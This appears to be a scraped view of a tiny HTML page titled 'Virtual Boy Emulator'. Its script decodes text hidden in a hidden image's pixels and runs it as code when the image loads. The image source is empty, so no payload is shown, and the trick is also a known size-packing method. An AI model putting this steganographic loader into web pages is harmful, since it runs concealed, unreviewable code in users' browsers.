13 lines
572 B
HTML
13 lines
572 B
HTML
<!DOCTYPE html>
|
|
<html lang="en">
|
|
<head>
|
|
<meta charset="utf-8">
|
|
<title>Virtual Boy Emulator</title>
|
|
<link rel="icon" href="data:;base64,iVBORw0KGgo=">
|
|
<script>window.a=async(b,c,d,e)=>{e=document.createElement('canvas');e.width=c;e.height=d;e=e.getContext('2d');e.drawImage(b,0,0);c=e.getImageData(0,0,c,d).data.filter((z,y)=>!(y&3));d=c.indexOf(0);Object.getPrototypeOf(a).constructor(String.fromCharCode(...c.slice(0,d)))(b,c,d)}</script>
|
|
</head>
|
|
<body>
|
|
<img alt="" style="display: none;" onload="a(this,width,height)" src="">
|
|
</body>
|
|
</html>
|